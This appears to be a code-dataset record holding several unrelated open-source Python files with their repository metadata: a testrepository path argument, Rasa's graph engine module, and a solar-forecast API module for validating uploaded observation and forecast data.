b4711abfe0207c4fdd5d7fb7ecbf017e753abbfd
|
[
"Apache-2.0"
] | 14
|
2015-03-31T16:30:51.000Z
|
2022-01-06T02:54:42.000Z
|
.tox/scenario/lib/python2.7/site-packages/testrepository/arguments/path.py
|
bdrich/neutron-lbaas
|
b4711abfe0207c4fdd5d7fb7ecbf017e753abbfd
|
[
"Apache-2.0"
] | 32
|
2015-01-14T01:46:29.000Z
|
2021-12-27T00:01:14.000Z
|
.tox/scenario/lib/python2.7/site-packages/testrepository/arguments/path.py
|
bdrich/neutron-lbaas
|
b4711abfe0207c4fdd5d7fb7ecbf017e753abbfd
|
[
"Apache-2.0"
] | 35
|
2015-03-04T04:33:01.000Z
|
2022-02-22T04:31:24.000Z
|
#
# Copyright (c) 2012 Testrepository Contributors
#
# Licensed under either the Apache License, Version 2.0 or the BSD 3-clause
# license at the users choice. A copy of both licenses are available in the
# project source as Apache-2.0 and BSD. You may not use this file except in
# compliance with one of these two licences.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under these licenses is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# license you chose for the specific language governing permissions and
# limitations under that license.
"""An Argument that gets the name of an existing path."""
import os.path
from testrepository.arguments import AbstractArgument
class ExistingPathArgument(AbstractArgument):
"""An argument that stores a string verbatim."""
def _parse_one(self, arg):
if arg == '--':
raise ValueError('-- is not a valid argument')
if not os.path.exists(arg):
raise ValueError('No such path %r' % (arg,))
return arg
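# --- Illustrative sketch (not part of the original module): parsing behaviour of
# ExistingPathArgument, assuming AbstractArgument's only required constructor
# argument is the argument name. The temporary file is just for demonstration.
def _example_existing_path_behaviour():  # pragma: no cover
    import tempfile
    arg = ExistingPathArgument('path')
    with tempfile.NamedTemporaryFile() as existing:
        parsed = arg._parse_one(existing.name)      # an existing path is returned verbatim
    try:
        arg._parse_one('/no/such/path/hopefully')   # a missing path raises ValueError
    except ValueError:
        return parsed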
| 36.096774
| 78
| 0.722967
|
f57dc0161bebf47a1b92fa2912a637ecbbe98751
| 50
|
py
|
Python
|
model/__init__.py
|
Thanatoz-1/VoxAvium
|
5716da378ae9a54c6f7b826c6e47b0c20633c3e1
|
[
"BSD-3-Clause"
] | null | null | null |
model/__init__.py
|
Thanatoz-1/VoxAvium
|
5716da378ae9a54c6f7b826c6e47b0c20633c3e1
|
[
"BSD-3-Clause"
] | null | null | null |
model/__init__.py
|
Thanatoz-1/VoxAvium
|
5716da378ae9a54c6f7b826c6e47b0c20633c3e1
|
[
"BSD-3-Clause"
] | null | null | null |
from .model import PANNsCNN14Att, PANNsResNet38Att
| 50
| 50
| 0.88
|
8c84ac9a422ed3a53f0c3391ff3abf831fb515d0
| 21,000
|
py
|
Python
|
rasa/engine/graph.py
|
dangnguyenngochai/rasa
|
538849e0eef0044c9f62799ce944cc54ad2d2c36
|
[
"Apache-2.0"
] | 1
|
2022-03-03T16:11:02.000Z
|
2022-03-03T16:11:02.000Z
|
rasa/engine/graph.py
|
dangnguyenngochai/rasa
|
538849e0eef0044c9f62799ce944cc54ad2d2c36
|
[
"Apache-2.0"
] | 250
|
2020-08-14T13:41:26.000Z
|
2022-03-28T12:10:13.000Z
|
rasa/engine/graph.py
|
goitf/rasa
|
0b87727fb40d22822ccf4539a34f0ab3c58e3c85
|
[
"Apache-2.0"
] | 1
|
2021-12-03T13:04:55.000Z
|
2021-12-03T13:04:55.000Z
|
from __future__ import annotations
import dataclasses
from abc import ABC, abstractmethod
from dataclasses import dataclass, field
import logging
from typing import Any, Callable, Dict, List, Optional, Text, Type, Tuple
from rasa.engine.exceptions import (
GraphComponentException,
GraphSchemaException,
)
import rasa.shared.utils.common
from rasa.engine.storage.resource import Resource
from rasa.engine.storage.storage import ModelStorage
from rasa.shared.exceptions import InvalidConfigException, RasaException
from rasa.shared.importers.autoconfig import TrainingType
logger = logging.getLogger(__name__)
@dataclass
class SchemaNode:
"""Represents one node in the schema.
Args:
needs: describes which parameters in `fn` (or `constructor_name`
if `eager==False`) are filled by which parent nodes.
uses: The class which models the behavior of this specific graph node.
constructor_name: The name of the constructor which should be used to
instantiate the component. If `eager==False` then the `constructor` can
also specify parameters which are filled by parent nodes. This is e.g.
useful if a parent node returns a `Resource` and this node wants to
directly load itself from this resource.
fn: The name of the function which should be called on the instantiated
component when the graph is executed. The parameters from `needs` are
filled from the parent nodes.
config: The user's configuration for this graph node. This configuration
            does not need to specify all possible parameters; the default values
for missing parameters will be filled in later.
eager: If `eager` then the component is instantiated before the graph is run.
            Otherwise it's instantiated as the graph runs (lazily). Usually we
            instantiate lazily during training and eagerly during inference (to
            avoid making the first prediction slower).
is_target: If `True` then this node can't be pruned during fingerprinting
(it might be replaced with a cached value though). This is e.g. used for
            all components which train, as their results always need to be added to
the model archive so that the data is available during inference.
is_input: Nodes with `is_input` are _always_ run (also during the fingerprint
run). This makes sure that we e.g. detect changes in file contents.
resource: If given, then the graph node is loaded from an existing resource
instead of instantiated from scratch. This is e.g. used to load a trained
component for predictions.
"""
needs: Dict[Text, Text]
uses: Type[GraphComponent]
constructor_name: Text
fn: Text
config: Dict[Text, Any]
eager: bool = False
is_target: bool = False
is_input: bool = False
resource: Optional[Resource] = None
@dataclass
class GraphSchema:
"""Represents a graph for training a model or making predictions."""
nodes: Dict[Text, SchemaNode]
def as_dict(self) -> Dict[Text, Any]:
"""Returns graph schema in a serializable format.
Returns:
The graph schema in a format which can be dumped as JSON or other formats.
"""
serializable_graph_schema = {"nodes": {}}
for node_name, node in self.nodes.items():
serializable = dataclasses.asdict(node)
# Classes are not JSON serializable (surprise)
serializable["uses"] = f"{node.uses.__module__}.{node.uses.__name__}"
serializable_graph_schema["nodes"][node_name] = serializable
return serializable_graph_schema
@classmethod
def from_dict(cls, serialized_graph_schema: Dict[Text, Any]) -> GraphSchema:
"""Loads a graph schema which has been serialized using `schema.as_dict()`.
Args:
serialized_graph_schema: A serialized graph schema.
Returns:
A properly loaded schema.
Raises:
GraphSchemaException: In case the component class for a node couldn't be
found.
"""
nodes = {}
for node_name, serialized_node in serialized_graph_schema["nodes"].items():
try:
serialized_node[
"uses"
] = rasa.shared.utils.common.class_from_module_path(
serialized_node["uses"]
)
resource = serialized_node["resource"]
if resource:
serialized_node["resource"] = Resource(**resource)
except ImportError as e:
raise GraphSchemaException(
"Error deserializing graph schema. Can't "
"find class for graph component type "
f"'{serialized_node['uses']}'."
) from e
nodes[node_name] = SchemaNode(**serialized_node)
return GraphSchema(nodes)
@property
def target_names(self) -> List[Text]:
"""Returns the names of all target nodes."""
return [node_name for node_name, node in self.nodes.items() if node.is_target]
def minimal_graph_schema(self, targets: Optional[List[Text]] = None) -> GraphSchema:
"""Returns a new schema where all nodes are a descendant of a target."""
dependencies = self._all_dependencies_schema(
targets if targets else self.target_names
)
return GraphSchema(
{
node_name: node
for node_name, node in self.nodes.items()
if node_name in dependencies
}
)
def _all_dependencies_schema(self, targets: List[Text]) -> List[Text]:
required = []
for target in targets:
required.append(target)
try:
target_dependencies = self.nodes[target].needs.values()
except KeyError: # This can happen if the target is an input placeholder.
continue
for dependency in target_dependencies:
required += self._all_dependencies_schema([dependency])
return required
class GraphComponent(ABC):
"""Interface for any component which will run in a graph."""
@classmethod
def required_components(cls) -> List[Type]:
"""Components that should be included in the pipeline before this component."""
return []
@classmethod
@abstractmethod
def create(
cls,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
) -> GraphComponent:
"""Creates a new `GraphComponent`.
Args:
config: This config overrides the `default_config`.
model_storage: Storage which graph components can use to persist and load
themselves.
resource: Resource locator for this component which can be used to persist
and load itself from the `model_storage`.
execution_context: Information about the current graph run.
Returns: An instantiated `GraphComponent`.
"""
...
@classmethod
def load(
cls,
config: Dict[Text, Any],
model_storage: ModelStorage,
resource: Resource,
execution_context: ExecutionContext,
**kwargs: Any,
) -> GraphComponent:
"""Creates a component using a persisted version of itself.
If not overridden this method merely calls `create`.
Args:
config: The config for this graph component. This is the default config of
the component merged with config specified by the user.
model_storage: Storage which graph components can use to persist and load
themselves.
resource: Resource locator for this component which can be used to persist
and load itself from the `model_storage`.
execution_context: Information about the current graph run.
kwargs: Output values from previous nodes might be passed in as `kwargs`.
Returns:
An instantiated, loaded `GraphComponent`.
"""
return cls.create(config, model_storage, resource, execution_context)
@staticmethod
def get_default_config() -> Dict[Text, Any]:
"""Returns the component's default config.
Default config and user config are merged by the `GraphNode` before the
config is passed to the `create` and `load` method of the component.
Returns:
The default config of the component.
"""
return {}
@staticmethod
def supported_languages() -> Optional[List[Text]]:
"""Determines which languages this component can work with.
Returns: A list of supported languages, or `None` to signify all are supported.
"""
return None
@staticmethod
def not_supported_languages() -> Optional[List[Text]]:
"""Determines which languages this component cannot work with.
Returns: A list of not supported languages, or
`None` to signify all are supported.
"""
return None
@staticmethod
def required_packages() -> List[Text]:
"""Any extra python dependencies required for this component to run."""
return []
class GraphNodeHook(ABC):
"""Holds functionality to be run before and after a `GraphNode`."""
@abstractmethod
def on_before_node(
self,
node_name: Text,
execution_context: ExecutionContext,
config: Dict[Text, Any],
received_inputs: Dict[Text, Any],
) -> Dict:
"""Runs before the `GraphNode` executes.
Args:
node_name: The name of the node being run.
execution_context: The execution context of the current graph run.
config: The node's config.
received_inputs: Mapping from parameter name to input value.
Returns:
Data that is then passed to `on_after_node`
"""
...
@abstractmethod
def on_after_node(
self,
node_name: Text,
execution_context: ExecutionContext,
config: Dict[Text, Any],
output: Any,
input_hook_data: Dict,
) -> None:
"""Runs after the `GraphNode` as executed.
Args:
node_name: The name of the node that has run.
execution_context: The execution context of the current graph run.
config: The node's config.
output: The output of the node.
input_hook_data: Data returned from `on_before_node`.
"""
...
@dataclass
class ExecutionContext:
"""Holds information about a single graph run."""
graph_schema: GraphSchema = field(repr=False)
model_id: Optional[Text] = None
should_add_diagnostic_data: bool = False
is_finetuning: bool = False
# This is set by the `GraphNode` before it is passed to the `GraphComponent`.
node_name: Optional[Text] = None
class GraphNode:
"""Instantiates and runs a `GraphComponent` within a graph.
A `GraphNode` is a wrapper for a `GraphComponent` that allows it to be executed
in the context of a graph. It is responsible for instantiating the component at the
correct time, collecting the inputs from the parent nodes, running the run function
of the component and passing the output onwards.
"""
def __init__(
self,
node_name: Text,
component_class: Type[GraphComponent],
constructor_name: Text,
component_config: Dict[Text, Any],
fn_name: Text,
inputs: Dict[Text, Text],
eager: bool,
model_storage: ModelStorage,
resource: Optional[Resource],
execution_context: ExecutionContext,
hooks: Optional[List[GraphNodeHook]] = None,
) -> None:
"""Initializes `GraphNode`.
Args:
node_name: The name of the node in the schema.
component_class: The class to be instantiated and run.
constructor_name: The method used to instantiate the component.
component_config: Config to be passed to the component.
fn_name: The function on the instantiated `GraphComponent` to be run when
the node executes.
inputs: A map from input name to parent node name that provides it.
eager: Determines if the node is instantiated right away, or just before
being run.
model_storage: Storage which graph components can use to persist and load
themselves.
resource: If given the `GraphComponent` will be loaded from the
`model_storage` using the given resource.
execution_context: Information about the current graph run.
hooks: These are called before and after execution.
"""
self._node_name: Text = node_name
self._component_class: Type[GraphComponent] = component_class
self._constructor_name: Text = constructor_name
self._constructor_fn: Callable = getattr(
self._component_class, self._constructor_name
)
self._component_config: Dict[Text, Any] = {
**self._component_class.get_default_config(),
**component_config,
}
self._fn_name: Text = fn_name
self._fn: Callable = getattr(self._component_class, self._fn_name)
self._inputs: Dict[Text, Text] = inputs
self._eager: bool = eager
self._model_storage = model_storage
self._existing_resource = resource
self._execution_context: ExecutionContext = dataclasses.replace(
execution_context, node_name=self._node_name
)
self._hooks: List[GraphNodeHook] = hooks if hooks else []
self._component: Optional[GraphComponent] = None
if self._eager:
self._load_component()
def _load_component(self, **kwargs: Any) -> None:
logger.debug(
f"Node '{self._node_name}' loading "
f"'{self._component_class.__name__}.{self._constructor_name}' "
f"and kwargs: '{kwargs}'."
)
constructor = getattr(self._component_class, self._constructor_name)
try:
self._component: GraphComponent = constructor( # type: ignore[no-redef]
config=self._component_config,
model_storage=self._model_storage,
resource=self._get_resource(kwargs),
execution_context=self._execution_context,
**kwargs,
)
except InvalidConfigException:
# Pass through somewhat expected exception to allow more fine granular
# handling of exceptions.
raise
except Exception as e:
if not isinstance(e, RasaException):
raise GraphComponentException(
f"Error initializing graph component for node {self._node_name}."
) from e
else:
logger.error(
f"Error initializing graph component for node {self._node_name}."
)
raise
def _get_resource(self, kwargs: Dict[Text, Any]) -> Resource:
if "resource" in kwargs:
# A parent node provides resource during training. The component wrapped
# by this `GraphNode` will load itself from this resource.
return kwargs.pop("resource")
if self._existing_resource:
# The component should be loaded from a trained resource during inference.
# E.g. a classifier might train and persist itself during training and will
# then load itself from this resource during inference.
return self._existing_resource
# The component gets a chance to persist itself
return Resource(self._node_name)
def __call__(
self, *inputs_from_previous_nodes: Tuple[Text, Any]
) -> Tuple[Text, Any]:
"""Calls the `GraphComponent` run method when the node executes in the graph.
Args:
*inputs_from_previous_nodes: The output of all parent nodes. Each is a
dictionary with a single item mapping the node's name to its output.
Returns:
The node name and its output.
"""
received_inputs: Dict[Text, Any] = dict(inputs_from_previous_nodes)
kwargs = {}
for input_name, input_node in self._inputs.items():
kwargs[input_name] = received_inputs[input_node]
input_hook_outputs = self._run_before_hooks(kwargs)
if not self._eager:
constructor_kwargs = rasa.shared.utils.common.minimal_kwargs(
kwargs, self._constructor_fn
)
self._load_component(**constructor_kwargs)
run_kwargs = {
k: v for k, v in kwargs.items() if k not in constructor_kwargs
}
else:
run_kwargs = kwargs
logger.debug(
f"Node '{self._node_name}' running "
f"'{self._component_class.__name__}.{self._fn_name}'."
)
try:
output = self._fn(self._component, **run_kwargs)
except InvalidConfigException:
# Pass through somewhat expected exception to allow more fine granular
# handling of exceptions.
raise
except Exception as e:
if not isinstance(e, RasaException):
raise GraphComponentException(
f"Error running graph component for node {self._node_name}."
) from e
else:
logger.error(
f"Error running graph component for node {self._node_name}."
)
raise
self._run_after_hooks(input_hook_outputs, output)
return self._node_name, output
def _run_after_hooks(self, input_hook_outputs: List[Dict], output: Any) -> None:
for hook, hook_data in zip(self._hooks, input_hook_outputs):
try:
logger.debug(
f"Hook '{hook.__class__.__name__}.on_after_node' "
f"running for node '{self._node_name}'."
)
hook.on_after_node(
node_name=self._node_name,
execution_context=self._execution_context,
config=self._component_config,
output=output,
input_hook_data=hook_data,
)
except Exception as e:
raise GraphComponentException(
f"Error running after hook for node '{self._node_name}'."
) from e
def _run_before_hooks(self, received_inputs: Dict[Text, Any]) -> List[Dict]:
input_hook_outputs = []
for hook in self._hooks:
try:
logger.debug(
f"Hook '{hook.__class__.__name__}.on_before_node' "
f"running for node '{self._node_name}'."
)
hook_output = hook.on_before_node(
node_name=self._node_name,
execution_context=self._execution_context,
config=self._component_config,
received_inputs=received_inputs,
)
input_hook_outputs.append(hook_output)
except Exception as e:
raise GraphComponentException(
f"Error running before hook for node '{self._node_name}'."
) from e
return input_hook_outputs
@classmethod
def from_schema_node(
cls,
node_name: Text,
schema_node: SchemaNode,
model_storage: ModelStorage,
execution_context: ExecutionContext,
hooks: Optional[List[GraphNodeHook]] = None,
) -> GraphNode:
"""Creates a `GraphNode` from a `SchemaNode`."""
return cls(
node_name=node_name,
component_class=schema_node.uses,
constructor_name=schema_node.constructor_name,
component_config=schema_node.config,
fn_name=schema_node.fn,
inputs=schema_node.needs,
eager=schema_node.eager,
model_storage=model_storage,
execution_context=execution_context,
resource=schema_node.resource,
hooks=hooks,
)
@dataclass()
class GraphModelConfiguration:
"""The model configuration to run as a graph during training and prediction."""
train_schema: GraphSchema
predict_schema: GraphSchema
training_type: TrainingType
language: Optional[Text]
core_target: Optional[Text]
nlu_target: Optional[Text]
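# --- Illustrative sketch (not part of the original module): a minimal GraphComponent.
# The class name, the "lowercase" config key and the `split` method below are
# hypothetical; they only show how `get_default_config`, `create` and the function
# referenced by `SchemaNode.fn` fit together.
class _ExampleWhitespaceSplitter(GraphComponent):
    def __init__(self, lowercase: bool) -> None:
        self._lowercase = lowercase
    @staticmethod
    def get_default_config() -> Dict[Text, Any]:
        return {"lowercase": True}
    @classmethod
    def create(
        cls,
        config: Dict[Text, Any],
        model_storage: ModelStorage,
        resource: Resource,
        execution_context: ExecutionContext,
    ) -> GraphComponent:
        return cls(config["lowercase"])
    def split(self, text: Text) -> List[Text]:
        # A SchemaNode would reference this method via `fn="split"`.
        return (text.lower() if self._lowercase else text).split()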
| 37.366548
| 88
| 0.619048
|
107168387754e1511c26a0a770806d3e86278691
| 16,951
|
py
|
Python
|
sfa_api/utils/request_handling.py
|
SolarArbiter/solarforecastarbiter-api
|
280800c73eb7cfd49029462b352887e78f1ff91b
|
[
"MIT"
] | 7
|
2018-12-07T22:05:36.000Z
|
2020-05-03T03:20:50.000Z
|
sfa_api/utils/request_handling.py
|
SolarArbiter/solarforecastarbiter-api
|
280800c73eb7cfd49029462b352887e78f1ff91b
|
[
"MIT"
] | 220
|
2018-11-01T23:33:19.000Z
|
2021-12-02T21:06:38.000Z
|
sfa_api/utils/request_handling.py
|
SolarArbiter/solarforecastarbiter-api
|
280800c73eb7cfd49029462b352887e78f1ff91b
|
[
"MIT"
] | 3
|
2018-10-31T20:55:07.000Z
|
2021-11-10T22:51:43.000Z
|
from collections import defaultdict
from io import StringIO
import json
import re
import string
from flask import request, current_app
import numpy as np
import pandas as pd
from solarforecastarbiter.datamodel import Forecast, Site
from solarforecastarbiter.reference_forecasts import utils as fx_utils
from werkzeug.exceptions import RequestEntityTooLarge
from sfa_api.utils.errors import (
BadAPIRequest, NotFoundException, StorageAuthError)
def validate_observation_values(observation_df, quality_flag_range=(0, 1)):
"""
Validate the columns of an observation value DataFrame.
Parameters
----------
observation_df : pandas.DataFrame
DataFrame to validate columns and values
quality_flag_range : tuple, default (0, 1)
Range of allowable quality_flag
Returns
-------
pandas.DataFrame
With types adjusted as appropriate
Raises
------
BadAPIRequest
For any errors in the columns or values
"""
errors = defaultdict(list)
try:
observation_df['value'] = pd.to_numeric(observation_df['value'],
downcast='float')
except ValueError:
errors['value'].append(
'Invalid item in "value" field. Ensure that all '
'values are integers, floats, empty, NaN, or NULL.')
except KeyError:
errors['value'].append('Missing "value" field.')
try:
observation_df['timestamp'] = pd.to_datetime(
observation_df['timestamp'],
utc=True)
except ValueError:
errors['timestamp'].append(
'Invalid item in "timestamp" field. Ensure '
'that timestamps are ISO8601 compliant')
except KeyError:
errors['timestamp'].append('Missing "timestamp" field.')
try:
observation_df['quality_flag'].astype(int)
except KeyError:
errors['quality_flag'].append('Missing "quality_flag" field.')
except (ValueError, TypeError):
errors['quality_flag'].append(
'Item in "quality_flag" field is not an integer.')
else:
if not np.isclose(
observation_df['quality_flag'].mod(1), 0, 1e-12).all():
errors['quality_flag'].append(
'Item in "quality_flag" field is not an integer.')
if not observation_df['quality_flag'].between(
*quality_flag_range).all():
errors['quality_flag'].append(
'Item in "quality_flag" field out of range '
f'{quality_flag_range}.')
if errors:
raise BadAPIRequest(errors)
return observation_df
def parse_csv(csv_string):
"""Parse a csv into a dataframe and raise appropriate errors
Parameters
----------
csv_string: str
String representation of csv to read into a dataframe
Returns
-------
pandas.DataFrame
Raises
------
BadAPIRequestError
If the string cannot be parsed.
"""
raw_data = StringIO(csv_string)
try:
value_df = pd.read_csv(raw_data,
na_values=[-999.0, -9999.0],
keep_default_na=True,
comment='#')
except (pd.errors.EmptyDataError, pd.errors.ParserError):
raise BadAPIRequest({'error': 'Malformed CSV'})
return value_df
def parse_json(json_str):
"""Parse a string of json values into a DataFrame
Parameters
----------
json_str: str
Returns
-------
pandas.DataFrame
Raises
------
BadAPIRequestError
If the 'values' key is missing, or if the contents of the
values key cannot be parsed into a DataFrame.
"""
try:
json_dict = json.loads(''.join(s for s in json_str
if s in string.printable))
except json.decoder.JSONDecodeError:
raise BadAPIRequest(error='Malformed JSON.')
try:
raw_values = json_dict['values']
except (TypeError, KeyError):
error = 'Supplied JSON does not contain "values" field.'
raise BadAPIRequest(error=error)
try:
value_df = pd.DataFrame(raw_values)
except ValueError:
raise BadAPIRequest({'error': 'Malformed JSON'})
return value_df
def parse_values(decoded_data, mimetype):
"""Attempts to parse a string of data into a DataFrame based on MIME type.
Parameters
----------
decoded_data: str
A string of data to parse.
mimetype: str
The MIME type of the data.
Returns
-------
pandas.DataFrame
Raises
------
BadAPIRequest
- If the MIME type is not one of 'text/csv', 'application/json',
or 'application/vnd.ms-excel'
- If parsing fails, see parse_json or parse_csv for conditions.
- If the file contains more than the maximum allowed number of
datapoints.
"""
if mimetype == 'text/csv' or mimetype == 'application/vnd.ms-excel':
values = parse_csv(decoded_data)
elif mimetype == 'application/json':
values = parse_json(decoded_data)
else:
error = "Unsupported Content-Type or MIME type."
raise BadAPIRequest(error=error)
if values.index.size > current_app.config.get('MAX_POST_DATAPOINTS'):
raise BadAPIRequest({
'error': ('File exceeds maximum number of datapoints. '
f'{current_app.config.get("MAX_POST_DATAPOINTS")} '
f'datapoints allowed, {values.index.size} datapoints '
'found in file.')
})
return values
def decode_file_in_request_body():
"""Decode the data from a utf-8 encoded file into a string and
return the contents and the file's mimetype.
Returns
-------
decoded_data: str
The posted utf-8 data as a string.
posted_file.mimetype: str
MIME type of the file in the request body.
Raises
------
BadAPIRequest
- There is more than one file in the request.
- If the request does not contain a file.
- The file does not contain valid utf-8.
"""
posted_files = list(request.files.keys())
if len(posted_files) > 1:
error = "Multiple files found. Please upload one file at a time."
raise BadAPIRequest(error=error)
try:
posted_filename = posted_files[0]
posted_file = request.files[posted_filename]
except IndexError:
error = "Missing file in request body."
raise BadAPIRequest(error=error)
posted_data = posted_file.read()
try:
decoded_data = posted_data.decode('utf-8')
except UnicodeDecodeError:
error = 'File could not be decoded as UTF-8.'
raise BadAPIRequest(error=error)
return decoded_data, posted_file.mimetype
def validate_parsable_values():
"""Can be called from a POST view/endpoint to examine posted
data for mimetype and attempt to parse to a DataFrame.
Raises
------
BadAPIRequest
If the data cannot be parsed.
werkzeug.exceptions.RequestEntityTooLarge
If the `Content-Length` header is greater than the application's
`MAX_CONTENT_LENGTH` config variable.
"""
# Default for content length in case of empty body
content_length = int(request.headers.get('Content-Length', 0))
if (content_length > current_app.config['MAX_CONTENT_LENGTH']):
raise RequestEntityTooLarge
if request.mimetype == 'multipart/form-data':
decoded_data, mimetype = decode_file_in_request_body()
else:
decoded_data = request.get_data(as_text=True)
mimetype = request.mimetype
value_df = parse_values(decoded_data, mimetype)
if value_df.size == 0:
raise BadAPIRequest({
'error': ("Posted data contained no values."),
})
return value_df
def parse_to_timestamp(dt_string):
"""Attempts to parse to Timestamp.
Parameters
----------
dt_string: str
Returns
-------
pandas.Timestamp
Raises
------
ValueError
If the string cannot be parsed to timestamp, or parses to null
"""
timestamp = pd.Timestamp(dt_string)
if pd.isnull(timestamp):
raise ValueError
if timestamp.tzinfo is None:
        # consistent with schema ISODateTime
timestamp = timestamp.tz_localize('UTC')
return timestamp
def validate_start_end():
"""Parses start and end query parameters into pandas
Timestamps.
Returns
-------
start: Pandas Timestamp
end: Pandas TimeStamp
Raises
------
BadAPIRequest
If start and end values cannot be parsed.
"""
errors = {}
start = request.args.get('start', None)
end = request.args.get('end', None)
if start is not None:
try:
start = parse_to_timestamp(start)
except ValueError:
errors.update({'start': ['Invalid start date format']})
else:
errors.update({'start': ['Must provide a start time']})
if end is not None:
try:
end = parse_to_timestamp(end)
except ValueError:
errors.update({'end': ['Invalid end date format']})
else:
errors.update({'end': ['Must provide a end time']})
if errors:
raise BadAPIRequest(errors)
# parse_to_timestamp ensures there is a tz
if end.tzinfo != start.tzinfo:
end = end.tz_convert(start.tzinfo)
if end - start > current_app.config['MAX_DATA_RANGE_DAYS']:
raise BadAPIRequest({'end': [
f'Only {current_app.config["MAX_DATA_RANGE_DAYS"].days} days of '
'data may be requested per request']})
return start, end
def validate_index_period(index, interval_length, previous_time):
"""
Validate that the index conforms to interval_length.
Parameters
----------
index : pd.DatetimeIndex
interval_length : int
Regular period of data in minutes
previous_time : pd.Timestamp or None
The last time in the database before the start of index.
May be None.
Raises
------
BadApiRequest
If there are any errors
"""
if len(index) == 0:
raise BadAPIRequest({'timestamp': ['No times to validate']})
errors = []
start = index[0]
end = index[-1]
freq = pd.Timedelta(f'{interval_length}min')
expected_index = pd.date_range(start=start, end=end,
freq=freq)
missing_times = expected_index.difference(index)
if len(missing_times) > 0:
errors.append(f'Missing {len(missing_times)} timestamps. '
f'First missing timestamp is {missing_times[0]}. '
'Uploads must have equally spaced timestamps '
f'from {start} to {end} with {interval_length} '
'minutes between each timestamp.')
extra_times = index.difference(expected_index)
if len(extra_times) > 0:
errors.append(f'{len(extra_times)} extra times present in index. '
f'First extra time is {extra_times[0]}. '
'Uploads must have equally spaced timestamps '
f'from {start} to {end} with {interval_length} '
'minutes between each timestamp.')
if previous_time is not None:
if (start - previous_time).total_seconds() % freq.total_seconds() != 0:
errors.append(
f'Start of timeseries is not a multiple of {interval_length} '
'minutes past the previous time of '
f'{previous_time.isoformat()}.')
if errors:
raise BadAPIRequest({'timestamp': errors})
def validate_forecast_values(forecast_df):
"""Validates that posted values are parseable and of the expectedtypes.
Parameters
----------
forecast_df: Pandas DataFrame
Raises
------
BadAPIRequestError
If an expected field is missing or contains an entry of incorrect
type.
"""
errors = {}
try:
forecast_df['value'] = pd.to_numeric(forecast_df['value'],
downcast='float')
except ValueError:
error = ('Invalid item in "value" field. Ensure that all values '
'are integers, floats, empty, NaN, or NULL.')
errors.update({'value': [error]})
except KeyError:
errors.update({'value': ['Missing "value" field.']})
try:
forecast_df['timestamp'] = pd.to_datetime(
forecast_df['timestamp'],
utc=True)
except ValueError:
error = ('Invalid item in "timestamp" field. Ensure that '
'timestamps are ISO8601 compliant')
errors.update({'timestamp': [error]})
except KeyError:
errors.update({'timestamp': ['Missing "timestamp" field.']})
if errors:
raise BadAPIRequest(errors)
def _restrict_in_extra(extra_params):
match = re.search('"restrict_upload(["\\s\\:]*)true',
extra_params, re.I)
return match is not None
def _current_utc_timestamp():
# for easier testing
return pd.Timestamp.now(tz='UTC')
def restrict_forecast_upload_window(extra_parameters, get_forecast,
first_time):
"""
Check that the first_time falls within the window before the
next initialization time of the forecast from the current time.
Accounts for forecast lead_time_to_start and interval_label.
Requires 'read' permission on the forecast in question.
Parameters
----------
extra_parameters : str
The extra_parameters string for the forecast. If
'"restrict_upload": true' is not found in the string, no restriction
occurs and this function returns immediately.
get_forecast : func
Function to get the forecast from the database.
first_time : datetime-like
First timestamp in the posted forecast timeseries.
Raises
------
NotFoundException
When the user does not have 'read' permission for the forecast or
it doesn't exist.
BadAPIRequest
        If the first_time of the timeseries is not consistent with the
        next initialization time of the forecast.
"""
if not _restrict_in_extra(extra_parameters):
return
try:
fx_dict = get_forecast().copy()
except (StorageAuthError, NotFoundException):
raise NotFoundException(errors={
'404': 'Cannot read forecast or forecast does not exist'})
# we don't care about the axis or constant values for probabilistic
fx_dict['site'] = Site('name', 0, 0, 0, 'UTC')
fx = Forecast.from_dict(fx_dict)
next_issue_time = fx_utils.get_next_issue_time(
fx, _current_utc_timestamp())
expected_start = next_issue_time + fx.lead_time_to_start
if fx.interval_label == 'ending':
expected_start += fx.interval_length
if first_time != expected_start:
raise BadAPIRequest(errors={'issue_time': (
f'Currently only accepting forecasts issued for {next_issue_time}.'
f' Expecting forecast series to start at {expected_start}.'
)})
def validate_latitude_longitude():
"""Validates latitude and longitude parameters
Returns
-------
latitude: float
longitude: float
Raises
------
BadAPIRequest
If latitude and longitude values are not provided
or not in range.
"""
errors = {}
lat = request.args.get('latitude', None)
lon = request.args.get('longitude', None)
if lat is not None:
try:
lat = float(lat)
except ValueError:
errors.update({'latitude': ['Must be a float']})
else:
if lat > 90 or lat < -90:
errors.update({
'latitude': ['Must be within [-90, 90].']})
else:
errors.update({'latitude': ['Must provide a latitude']})
if lon is not None:
try:
lon = float(lon)
except ValueError:
errors.update({'longitude': ['Must be a float']})
else:
if lon > 180 or lon < -180:
errors.update({'longitude':
['Must be within (-180, 180].']})
else:
errors.update({'longitude': ['Must provide a longitude']})
if errors:
raise BadAPIRequest(errors)
return lat, lon
def validate_event_data(data):
"""
Validate that the data is either 0 or 1
Parameters
----------
data : pd.Dataframe with 'value' column
Raises
------
BadApiRequest
If there are any errors
"""
isbool = (data['value'] == 0) | (data['value'] == 1)
if not isbool.all():
indx = isbool.reset_index()[~isbool.values].index.astype('str')
raise BadAPIRequest({'value': [
'Invalid event values at locations %s' % ', '.join(indx)]})
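# --- Illustrative sketch (not part of the original module): how validate_index_period
# reacts to a gap. The timestamps below are hypothetical; with interval_length=5 the
# 10:10 stamp is missing from the 5 minute grid, so a BadAPIRequest is raised.
def _example_index_gap():  # pragma: no cover
    index = pd.DatetimeIndex(
        ['2020-01-01 10:00', '2020-01-01 10:05', '2020-01-01 10:15'], tz='UTC')
    try:
        validate_index_period(index, interval_length=5, previous_time=None)
    except BadAPIRequest:
        return 'rejected: missing 2020-01-01 10:10 timestamp'
    return 'accepted'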
| 31.332717
| 79
| 0.613238
|
587d371a4ef1b63fa00833efae81fb1010f6b3ab
| 5,828
|
py
|
Python
|
pororo/models/brainbert/criterions/dependency_parse.py
|
jayten42/pororo
|
0b02e6a633b9a32ec4241b8ed96745e6592db317
|
[
"Apache-2.0"
] | 1,137
|
2021-02-02T02:09:06.000Z
|
2022-03-29T03:10:40.000Z
|
pororo/models/brainbert/criterions/dependency_parse.py
|
jayten42/pororo
|
0b02e6a633b9a32ec4241b8ed96745e6592db317
|
[
"Apache-2.0"
] | 57
|
2021-02-02T03:29:54.000Z
|
2022-03-31T16:20:00.000Z
|
pororo/models/brainbert/criterions/dependency_parse.py
|
